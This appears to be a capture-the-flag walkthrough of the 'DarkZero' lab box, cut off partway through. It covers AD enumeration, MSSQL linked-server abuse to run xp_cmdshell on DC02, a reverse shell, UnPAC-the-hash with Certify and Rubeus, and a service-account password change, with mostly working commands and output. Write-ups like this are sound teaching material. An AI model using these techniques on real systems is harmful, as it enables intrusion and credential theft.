by 0xW1LD
As is common in real-life pentests, the DarkZero box starts you off with credentials for the account john.w / RFulUtONCOL!
As usual we start off with an nmap port scan.
```
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49908/tcp open unknown
58371/tcp open unknown
60946/tcp open unknown
```
Looks like we have the usual Active Directory ports up: 53 (DNS), 88 (Kerberos), 135 (MSRPC), 139 (NetBIOS session), 389/636 (LDAP/LDAPS), 445 (SMB), 464 (kpasswd), 3268/3269 (Global Catalog), 5985 (WinRM) and 9389 (ADWS).
Some interesting ports that aren’t usual include:
```
1433 - MSSQL # Not usual on a DC; gives us xp_cmdshell, xp_dirtree and linked servers to look at
2179 - VMRDP # Hyper-V VMConnect console port, so DC01 is most likely a Hyper-V host itself
```
Let’s do a quick check on what SMB shares we have access to.
```
$ nxc smb $T -u $USER -p $PASS --shares
SMB 10.129.242.233 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.242.233 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.242.233 445 DC01 [*] Enumerated shares
SMB 10.129.242.233 445 DC01 Share Permissions Remark
SMB 10.129.242.233 445 DC01 ----- ----------- ------
SMB 10.129.242.233 445 DC01 ADMIN$ Remote Admin
SMB 10.129.242.233 445 DC01 C$ Default share
SMB 10.129.242.233 445 DC01 IPC$ READ Remote IPC
SMB 10.129.242.233 445 DC01 NETLOGON READ Logon server share
SMB 10.129.242.233 445 DC01 SYSVOL READ Logon server share
```
No interesting shares, only the default READ on IPC$, NETLOGON and SYSVOL. Two things are still worth noting: the target is Windows Server 2025 build 26100, recent enough that a known unpatched exploit is unlikely, so we should expect to win through misconfiguration rather than a CVE; and SMB signing is required (signing:True), which rules out NTLM relay to this host.
One of the first things I check for is local authentication, just to check if we also have a local account in addition to our domain account.
```
$ nxc ldap $T -u $USER -p $PASS --local-auth
LDAP 10.129.242.233 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
LDAPS 10.129.242.233 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
```
The login still comes back as darkzero.htb\john.w, so this is the same domain authentication rather than a separate local account; a domain controller has no local SAM accounts to log on to anyway (apart from the DSRM administrator), so this check tells us nothing new here.
Let’s check for our direct write ACLs using bloodyAD.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=darkzero,DC=htb
permission: WRITE
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
permission: WRITE
```
S-1-5-11 is the well-known SID of Authenticated Users, and its ForeignSecurityPrincipals entry is only the placeholder object that lets that group appear in ACLs and group memberships; a write on it gives us nothing. The only other writable object is our own user, so there is no ACL path to start from.
Let’s check out what users we can find in the domain.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=user)" --attr SamAccountName
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
sAMAccountName: Administrator
distinguishedName: CN=Guest,CN=Users,DC=darkzero,DC=htb
sAMAccountName: Guest
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
sAMAccountName: DC01$
distinguishedName: CN=krbtgt,CN=Users,DC=darkzero,DC=htb
sAMAccountName: krbtgt
distinguishedName: CN=darkzero-ext$,CN=Users,DC=darkzero,DC=htb
sAMAccountName: darkzero-ext$
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
sAMAccountName: john.w
```
In addition to the standard Administrator, Guest, krbtgt and DC01$ accounts there is darkzero-ext$. Despite the trailing dollar sign this is not a machine account: it sits in CN=Users rather than under a computer OU and is named after another domain, which is the naming convention for an inter-domain trust account. So there is a trust with a darkzero.ext domain, something we will confirm later. Let’s check for ServicePrincipalNames.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=user)" --attr servicePrincipalName
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=Guest,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
servicePrincipalName: Hyper-V Replica Service/DC01; Hyper-V Replica Service/DC01.darkzero.htb; Microsoft Virtual System Migration Service/DC01; Microsoft Virtual System Migration Service/DC01.darkzero.htb; Microsoft Virtual Console Service/DC01; Microsoft Virtual Console Service/DC01.darkzero.htb; Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb; ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb; ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb; DNS/DC01.darkzero.htb; GC/DC01.darkzero.htb/darkzero.htb; RestrictedKrbHost/DC01.darkzero.htb; RestrictedKrbHost/DC01; RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; HOST/DC01/darkzero; HOST/DC01.darkzero.htb/darkzero; HOST/DC01; HOST/DC01.darkzero.htb; HOST/DC01.darkzero.htb/darkzero.htb; E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb; ldap/DC01/darkzero; ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; ldap/DC01.darkzero.htb/darkzero; ldap/DC01; ldap/DC01.darkzero.htb; ldap/DC01.darkzero.htb/darkzero.htb
distinguishedName: CN=krbtgt,CN=Users,DC=darkzero,DC=htb
servicePrincipalName: kadmin/changepw
distinguishedName: CN=darkzero-ext$,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
```
As usual the DC carries a long list of SPNs. The Hyper-V Replica, Virtual System Migration and Virtual Console entries confirm that DC01 runs the Hyper-V role, which explains port 2179. kadmin/changepw on krbtgt is present in every domain and that account is always disabled, so it is not a target. No ordinary user account has an SPN, so there is nothing to Kerberoast, which a roasting attempt confirms:
```
$ nxc ldap $T -u $USER -p $PASS --kerberoasting krbroast.txt
LDAP 10.129.242.233 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01)
LDAPS 10.129.242.233 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LDAPS 10.129.242.233 636 DC01 [*] Skipping disabled account: krbtgt
LDAPS 10.129.242.233 636 DC01 [*] Total of records returned 0
```
Let’s check for which users are members of which groups.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=user)" --attr memberOf
distinguishedName: CN=Administrator,CN=Users,DC=darkzero,DC=htb
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=darkzero,DC=htb; CN=Domain Admins,CN=Users,DC=darkzero,DC=htb; CN=Enterprise Admins,CN=Users,DC=darkzero,DC=htb; CN=Schema Admins,CN=Users,DC=darkzero,DC=htb; CN=Administrators,CN=Builtin,DC=darkzero,DC=htb
distinguishedName: CN=Guest,CN=Users,DC=darkzero,DC=htb
memberOf: CN=Guests,CN=Builtin,DC=darkzero,DC=htb
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=darkzero,DC=htb; CN=Cert Publishers,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=krbtgt,CN=Users,DC=darkzero,DC=htb
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=darkzero-ext$,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=john.w,CN=Users,DC=darkzero,DC=htb
```
Now let’s do the same enumeration for computers on the domain.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(objectClass=computer)" --attr sAMAccountName,memberOf,servicePrincipalName
distinguishedName: CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=darkzero,DC=htb; CN=Cert Publishers,CN=Users,DC=darkzero,DC=htb
sAMAccountName: DC01$
servicePrincipalName: Hyper-V Replica Service/DC01; Hyper-V Replica Service/DC01.darkzero.htb; Microsoft Virtual System Migration Service/DC01; Microsoft Virtual System Migration Service/DC01.darkzero.htb; Microsoft Virtual Console Service/DC01; Microsoft Virtual Console Service/DC01.darkzero.htb; Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb; ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb; ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb; DNS/DC01.darkzero.htb; GC/DC01.darkzero.htb/darkzero.htb; RestrictedKrbHost/DC01.darkzero.htb; RestrictedKrbHost/DC01; RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; HOST/DC01/darkzero; HOST/DC01.darkzero.htb/darkzero; HOST/DC01; HOST/DC01.darkzero.htb; HOST/DC01.darkzero.htb/darkzero.htb; E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb; ldap/DC01/darkzero; ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb; ldap/DC01.darkzero.htb/darkzero; ldap/DC01; ldap/DC01.darkzero.htb; ldap/DC01.darkzero.htb/darkzero.htb
```
Let’s check out non-standard groups.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get search --filter "(&(objectClass=group)(!(isCriticalSystemObject=TRUE)))" --attr distinguishedName
distinguishedName: CN=DnsAdmins,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=darkzero,DC=htb
distinguishedName: CN=SQLServer2005SQLBrowserUser$DC01,CN=Users,DC=darkzero,DC=htb
```
The most interesting one is probably the SQLServer2005SQLBrowserUser group. Let’s take a closer look at this object.
```
$ bloodyAD -d $D --host $T -u $USER -p $PASS get object 'SQLServer2005SQLBrowserUser$DC01' --resolve-sd
distinguishedName: CN=SQLServer2005SQLBrowserUser$DC01,CN=Users,DC=darkzero,DC=htb
cn: SQLServer2005SQLBrowserUser$DC01
dSCorePropagationData: 1601-01-01 00:00:00+00:00
description: Members in the group have the required access and privileges to be assigned as the log on account for the associated instance of SQL Server Browser.
groupType: -2147483644
instanceType: 4
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.0.Right: READ_PROP
nTSecurityDescriptor.ACL.0.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.1.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.1.ObjectType: Send-To
nTSecurityDescriptor.ACL.2.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.2.Trustee: Domain Admins; ACCOUNT_OPERATORS; LOCAL_SYSTEM
nTSecurityDescriptor.ACL.2.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.2.ObjectType: Self
nTSecurityDescriptor.ACL.3.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.3.Trustee: PRINCIPAL_SELF; AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.3.Right: GENERIC_READ
nTSecurityDescriptor.ACL.3.ObjectType: Self
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.4.Right: READ_PROP
nTSecurityDescriptor.ACL.4.ObjectType: Remote-Access-Information (property set); Group-Membership (property set); Logon-Information (property set); Account-Restrictions (property set); General-Information (property set)
nTSecurityDescriptor.ACL.4.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.4.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.5.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.5.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.5.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.6.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.6.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.6.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.6.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.7.Right: READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.7.InheritedObjectType: Computer; User
nTSecurityDescriptor.ACL.7.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.8.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.8.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.8.Right: READ_PROP
nTSecurityDescriptor.ACL.8.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.8.InheritedObjectType: Group
nTSecurityDescriptor.ACL.8.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.9.Right: WRITE_PROP
nTSecurityDescriptor.ACL.9.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.9.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.10.Right: GENERIC_READ
nTSecurityDescriptor.ACL.10.ObjectType: Self
nTSecurityDescriptor.ACL.10.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.11.Right: GENERIC_READ
nTSecurityDescriptor.ACL.11.ObjectType: Self
nTSecurityDescriptor.ACL.11.InheritedObjectType: Group
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.12.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.12.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.13.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.13.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.14.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.14.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.14.ObjectType: Self
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.15.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.15.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.15.Right: LIST_CHILD
nTSecurityDescriptor.ACL.15.ObjectType: Self
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.16.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.16.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.16.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.16.ObjectType: Self
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERITED
name: SQLServer2005SQLBrowserUser$DC01
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=darkzero,DC=htb
objectClass: top; group
objectGUID: 68f18300-4c1b-4e85-aab0-825e2b8da318
objectSid: S-1-5-21-1152179935-589108180-1989892463-2601
sAMAccountName: SQLServer2005SQLBrowserUser$DC01
sAMAccountType: 536870912
uSNChanged: 45113
uSNCreated: 45110
whenChanged: 2025-07-29 15:11:45+00:00
whenCreated: 2025-07-29 15:11:45+00:00
```
Everything here is an inherited default ACE and none of it is directly exploitable. The one that catches the eye is ACE 12:
```
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.12.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.12.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
```
This is the default ACE inherited from the domain head that lets every object write its own RBCD attribute (note the INHERITED flag and the absence of an InheritedObjectType). It is not a right that membership in this group would give us, and resource-based constrained delegation only matters on an account that runs a service, so it is a dead end on a group. What the object does tell us is that SQL Server setup ran on DC01 (the $DC01 suffix and the description), so the MSSQL instance on port 1433 belongs to the DC itself.
Let’s check out mssql using netexec.
```
$ nxc mssql $D -u $USER -p $PASS
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
```
Looks like we have access; let’s enumerate impersonation rights, logins and linked servers.
```
$ nxc mssql $D -u $USER -p $PASS -M enum_impersonate
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_IMP... 10.129.242.233 1433 DC01 [-] No users with impersonation rights found.
$ nxc mssql $D -u $USER -p $PASS -M enum_logins
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LOGINS 10.129.242.233 1433 DC01 [+] Logins found:
ENUM_LOGINS 10.129.242.233 1433 DC01 [*] - sa
$ nxc mssql $D -u $USER -p $PASS -M enum_links
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LINKS 10.129.242.233 1433 DC01 [+] Linked servers found:
ENUM_LINKS 10.129.242.233 1433 DC01 [*] - DC01
ENUM_LINKS 10.129.242.233 1433 DC01 [*] - DC02.darkzero.ext
```
That gives us one visible login (sa) and two linked servers: DC01, which loops back to the instance we are already on, and DC02.darkzero.ext, an instance in the other domain of the trust. The linked server is the interesting part: queries sent through a link execute on the remote instance under whatever login the link is configured to map us to, which can be far more privileged than our own login on DC01.
Let’s attempt to enable xp_cmdshell on the linked servers.
```
$ nxc mssql $D -u $USER -p $PASS -M link_enable_xp -o LINKED_SERVER=DC01
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling advanced options on DC01...
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling xp_cmdshell on DC01...
LINK_ENA... 10.129.242.233 1433 DC01 [*] []
LINK_ENA... 10.129.242.233 1433 DC01 [+] xp_cmdshell enabled on DC01
$ nxc mssql $D -u $USER -p $PASS -M link_enable_xp -o LINKED_SERVER=DC02.darkzero.ext
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling advanced options on DC02.darkzero.ext...
LINK_ENA... 10.129.242.233 1433 DC01 [*] Enabling xp_cmdshell on DC02.darkzero.ext...
LINK_ENA... 10.129.242.233 1433 DC01 [*] []
LINK_ENA... 10.129.242.233 1433 DC01 [+] xp_cmdshell enabled on DC02.darkzero.ext
```
Success! Let’s now check if we can run commands on these links.
```
$ nxc mssql $D -u $USER -p $PASS -M link_xpcmd -o LINKED_SERVER=DC01 CMD="whoami"
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_XPCMD 10.129.242.233 1433 DC01 [*] Running command on DC01: whoami
LINK_XPCMD 10.129.242.233 1433 DC01 [+] Command output:
[]
$ nxc mssql $D -u $USER -p $PASS -M link_xpcmd -o LINKED_SERVER=DC02.darkzero.ext CMD="whoami"
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL 10.129.242.233 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.242.233 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_XPCMD 10.129.242.233 1433 DC01 [*] Running command on DC02.darkzero.ext: whoami
LINK_XPCMD 10.129.242.233 1433 DC01 [+] Command output:
[{'output': 'darkzero-ext\\svc_sql'}, {'output': 'NULL'}]
```
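The three netexec modules above (enum_links, link_enable_xp, link_xpcmd) wrap a handful of T-SQL statements. As an added example that is not part of the original post, this is the same chain written out by hand for any SQL client connected to DC01 (mssqlclient.py works). The linked-server name [DC02.darkzero.ext] comes from the enumeration output; everything else is standard system catalog. The extra step that the modules skip, and the one worth running first, is asking the remote end who it thinks we are, because the link's login mapping is what turns a guest login on DC01 into something useful on DC02.

```sql
-- Added example, not from the original post. Run from a session on DC01.
-- [DC02.darkzero.ext] is the linked server found with enum_links.

-- 1. Our own context on DC01, and which links allow remote procedure calls.
--    EXEC ... AT needs is_rpc_out_enabled = 1 on the link; OPENQUERY only needs data access.
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
SELECT name, product, provider, data_source, is_rpc_out_enabled, is_data_access_enabled
FROM   sys.servers;

-- 2. The question that matters: who do we become on the remote end?
--    DC01 applies the link's login mapping, so this runs on DC02 as the mapped login.
EXEC ('SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS remote_sysadmin')
  AT [DC02.darkzero.ext];

-- 3. If the remote login is sysadmin, enable xp_cmdshell there (what link_enable_xp does).
--    Both sp_configure changes are written to the SQL Server error log, so this is not OPSEC-safe.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')          AT [DC02.darkzero.ext];

-- 4. Run a command on DC02 (what link_xpcmd does). The child process runs under DC02's
--    SQL Server service account (darkzero-ext\svc_sql in this box), not as our login.
EXEC ('EXEC master..xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];

-- 5. Put the setting back when finished; the netexec module leaves it enabled.
EXEC ('EXEC sp_configure ''xp_cmdshell'', 0; RECONFIGURE;') AT [DC02.darkzero.ext];
```

Step 2 pointed at the DC01 loop-back link is also the quickest way to see why that link gave nothing back: whatever it maps us to is not sysadmin, so the sp_configure calls have no effect and xp_cmdshell is never reachable there.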
The loop-back link to DC01 returns nothing, but on DC02.darkzero.ext we have command execution as darkzero-ext\svc_sql. Using this, I grab a reverse shell.
```
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
darkzero-ext\svc_sql
```
Looking around, the strangest thing we notice is that our svc_sql shell has an unusual lack of privileges. We can compare the current set with what Microsoft’s Configure Windows Service Accounts and Permissions documentation says SQL Server setup grants to the service account.
```
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```
We are missing the following rights that SQL Server setup normally grants its service account (the first is a logon right rather than a privilege, so whoami /priv would not list it even if held; the other two should appear and don’t):
- SeServiceLogonRight
- SeAssignPrimaryTokenPrivilege
- SeIncreaseQuotaPrivilege

Most notably, SeImpersonatePrivilege is absent too, so the usual Potato route is closed from this shell. The next steps would be much easier if we could authenticate to the darkzero.ext domain with credentials, so let’s grab them with an UnPAC-the-hash attack. Transferring Certify.exe, I request a certificate from the User template.
```
PS C:\w1ld> .\Certify.exe request /ca:DC02.darkzero.ext\darkzero-ext-dc02-CA /template:User
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Certificate Authority : DC02.darkzero.ext\darkzero-ext-dc02-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
<SNIP>
```
I transfer the output cert.pem file to my attacker machine and convert it to a pfx file, without specifying a password.
```
$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
```
After which I transfer the pfx file back to the machine and request credentials with Rubeus. /getcredentials makes Rubeus follow the PKINIT TGT with a U2U request to itself and pull the NT hash out of the PAC, which is the UnPAC-the-hash step.
```
PS C:\w1ld> .\Rubeus.exe asktgt /user:svc_sql /certificate:C:\W1ld\cert.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=svc_sql, CN=Users, DC=darkzero, DC=ext
[*] Building AS-REQ (w/ PKINIT preauth) for: 'darkzero.ext\svc_sql'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
<SNIP>
```
We’ve successfully recovered the NT hash for the current user!
You can also do this from the attacker machine directly using PKINITtools. I just used the compromised Windows machine as I already had Rubeus on it while doing some enumeration.
Now I want to run commands as a service. RunasCs.exe can do that with logon type 5 (Service): a token created by a service logon carries the NT AUTHORITY\SERVICE group SID, which holds SeImpersonatePrivilege by default, and that is exactly the privilege our xp_cmdshell shell is missing. Logon type 5 requires a cleartext password rather than a hash, and the account must hold SeServiceLogonRight, which SQL Server setup grants its service account. We only have the NT hash, but that is enough to change the password, since changepasswd.py accepts the hash as the old credential. Keep in mind that on a real engagement this is destructive: changing a service account’s password breaks the service at its next restart, so agree it with the client first or find another route.
```
$ changepasswd.py darkzero.ext/svc_sql@dc02.darkzero.ext -newpass 'Password123!' -hashes ":[REDACTED]"
/home/kali/.local/share/uv/tools/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of darkzero.ext\svc_sql
